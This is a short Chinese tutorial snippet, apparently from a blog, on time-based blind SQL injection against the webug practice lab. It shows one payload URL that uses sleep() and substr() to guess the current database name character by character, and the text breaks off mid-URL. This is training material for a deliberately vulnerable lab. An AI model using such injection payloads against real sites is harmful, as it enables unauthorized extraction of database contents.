webug延时注入

通过之前的报错可以得知sql语句 利用sleep()函数构造延时语句,发现页面延迟响应 和布尔注入一样,通过观察页面状态来猜测数据库名、表名等信息 爆当前数据库名 http://192.168.199.143/control/sqlinject/bool_injection.php?id=1’and if(ascii(substr(database(),1,1))>118,1,sleep(5))%
相关文章
相关标签/搜索